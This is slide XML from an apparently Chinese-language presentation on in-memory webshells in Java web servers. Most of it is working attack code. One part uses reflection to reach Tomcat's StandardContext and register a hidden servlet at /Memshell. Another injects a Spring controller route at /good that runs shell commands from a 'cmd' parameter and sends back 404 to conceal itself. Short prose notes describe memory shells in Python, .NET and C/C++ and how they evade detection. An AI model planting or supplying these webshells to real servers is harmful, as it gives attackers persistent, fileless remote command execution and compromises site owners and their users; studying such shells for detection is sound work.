              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>    String name = Shell_Servlet.class.getSimpleName();</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>    ServletContext servletContext = request.getServletContext();</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>    Field applicationContextField = servletContext.getClass().getDeclaredField("context");</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>    applicationContextField.setAccessible(true);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>    ApplicationContext applicationContext = (ApplicationContext)applicationContextField.get(servletContext);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>    Field standardContextField = applicationContext.getClass().getDeclaredField("context");</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>    standardContextField.setAccessible(true);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>    StandardContext context = (StandardContext)standardContextField.get(applicationContext);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>    //注册进context</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>    Wrapper wrapper = context.createWrapper();</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>    wrapper.setName(name);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>    wrapper.setServletClass(Shell_Servlet.class.getName());</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>    wrapper.setServlet(new Shell_Servlet());</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>    context.addChild(wrapper);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1600"/>
              <a:t>    context.addServletMappingDecoded("/Memshell",name);</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zh-CN" altLang="en-US"/>
              <a:t>恶意类：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>   public class Shell_Servlet implements Servlet {</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>         @Override</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>        public void service(ServletRequest req, ServletResponse res) throws ServletException, IOException {</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>            HttpServletRequest lrequest = (HttpServletRequest) req;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>            HttpServletResponse lresponse = (HttpServletResponse) res;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>            if (lrequest.getParameter("cmd") != null){</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>                Process process = Runtime.getRuntime().exec(lrequest.getParameter("cmd"));</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>                java.io.BufferedReader bufferedReader = new java.io.BufferedReader(</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>                        new java.io.InputStreamReader(process.getInputStream()));</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>                StringBuilder stringBuilder = new StringBuilder();</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>                String line;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>                while ((line = bufferedReader.readLine()) != null) {</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>                    stringBuilder.append(line + '\n');</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>                }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>                lresponse.getOutputStream().write(stringBuilder.toString().getBytes());</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>                lresponse.getOutputStream().flush();</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>                lresponse.getOutputStream().close();</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>                return;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>            }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1600"/>
              <a:t>        }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1600"/>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r>
              <a:rPr lang="en-US" altLang="zh-CN" spc="0">
                <a:ln>
                  <a:noFill/>
                </a:ln>
                <a:effectLst/>
                <a:uLnTx/>
                <a:latin typeface="+mn-lt"/>
                <a:ea typeface="+mn-ea"/>
                <a:cs typeface="+mn-cs"/>
                <a:sym typeface="Arial" panose="020B0604020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>基于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>Spring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>内存马</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en-US" altLang="zh-CN"/>
              <a:t>Controller</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>型内存：类比于</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>tomcat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>中的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>StandardContext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>在</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>Spring</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>中也有相应的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>context</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>对象为WebApplicationContext。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>WebApplicationContext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>继承了</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>BeanFactory</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>，所以能用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t>getBean</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>直接获取RequestMappingHandlerMapping，进而注册路由，重点是如何获取</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>WebApplicationContext</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>核心代码如下：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>将DispatcherServlet的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>CONTEXT</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>上下转换成WebApplicationContext 。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" b="1">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t> WebApplicationContext context = (WebApplicationContext) RequestContextHolder.currentRequestAttributes().getAttribute("org.springframework.web.servlet.DispatcherServlet.CONTEXT", 0);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>//从 Spring 上下文中获取 RequestMappingHandlerMapping 的实例。RequestMappingHandlerMapping 是一个 Spring MVC 的核心组件，用于处理请求映射的注册和查找。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" b="1">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>        RequestMappingHandlerMapping mappingHandlerMapping = context.getBean(RequestMappingHandlerMapping.class);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>//</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>拿到</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>text</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>方法，该方法就是恶意类</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400" b="1">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>        Method method2 = InjectToController.class.getMethod("test");</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>//设置了一个 URL "good"。这意味着该请求将会处理路径为 /good 的 HTTP 请求</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" b="1">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>        PatternsRequestCondition url = new PatternsRequestCondition("good");</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>//用于定义请求方法（如 GET、POST 等）。在这里没有设置具体的请求方法，表示该请求映射会适用于所有 HTTP 方法。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" b="1">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>        RequestMethodsRequestCondition ms = new RequestMethodsRequestCondition();</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>        RequestMappingInfo info = new RequestMappingInfo(url, ms, null, null, null, null, null);</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>        InjectToController injectToController = new InjectToController("aaa");</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="1400">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1400" b="1">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>//将创建的 RequestMappingInfo、控制器实例 (injectToController) 及其方法 (method2) 注册到 mappingHandlerMapping 中。这样，当收到符合条件的 HTTP 请求（即请求路径为 /good）时，Spring MVC 会调用 injectToController 实例中的 test 方法。</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1400" b="1">
              <a:sym typeface="+mn-ea"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="1400">
                <a:sym typeface="+mn-ea"/>
              </a:rPr>
              <a:t>        mappingHandlerMapping.registerMapping(info, injectToController, method2); </a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="14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416550"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>内存马从语言上的分类：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" b="1"/>
              <a:t>Java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>内存马：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>隐藏性：利用Java的内存管理机制来隐藏自身，通过动态代理、类加载器（Class Loader）来动态加载恶意代码，使得代码在运行时才被编译和加载，增加了检测难度，利用Java的反射机制来动态调用方法。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>内存驻留：Java内存马会在JVM的内存空间中长期驻留，不进行任何文件级别的持久化存储这意味着即使没有明显的文件痕迹，恶意代码仍然可以在内存中持续运行。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:pPr indent="457200"/>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>Python内存马：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>利用flask框架中存在的ssti注入来实现内存修改的,特征使用importlib或自定义的__import__操作来加载恶意模块，使用threading或multiprocessing库创建持久化的线程或进程，通过全局解释器锁（GIL）和其他内存分配策略来操纵内存，以及通过HTTP请求或其他通信手段向攻击者反馈系统状态。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>.NET内存马：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>自我删除进入内存死循环繁殖的木马不断回连的URL。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" b="1"/>
              <a:t>C/C++内存马：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" b="1"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US"/>
              <a:t>使用dlopen()函数加载恶意共享库的自定义加载机制，通过system()、popen()等方式执行系统命令，使用fork()创建子进程并在后台运行以隐藏恶意活动，以及使用malloc()、calloc()或realloc()进行异常内存分配或重分配。</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN"/>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zh-CN" altLang="en-US"/>
              <a:t>恶意类：</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>   public void test() throws  IOException{</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>        HttpServletRequest request = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getRequest();</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>        HttpServletResponse response = ((ServletRequestAttributes) (RequestContextHolder.currentRequestAttributes())).getResponse();</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>        //exec</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>        try {</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>            String arg0 = request.getParameter("cmd");</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>            PrintWriter writer = response.getWriter();</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>            if (arg0 != null) {</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>                String o = "";</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>                java.lang.ProcessBuilder p;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>                if(System.getProperty("os.name").toLowerCase().contains("win")){</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>                    p = new java.lang.ProcessBuilder(new String[]{"cmd.exe", "/c", arg0});</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>                }else{</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>                    p = new java.lang.ProcessBuilder(new String[]{"/bin/sh", "-c", arg0});</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>                }</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>                java.util.Scanner c = new java.util.Scanner(p.start().getInputStream()).useDelimiter("\\A");</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>                o = c.hasNext() ? c.next(): o;</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>                c.close();</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>                writer.write(o);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>                writer.flush();</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>                writer.close();</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>            }else{</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>                response.sendError(404);</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="1200"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="1200"/>
              <a:t>            }</a:t>
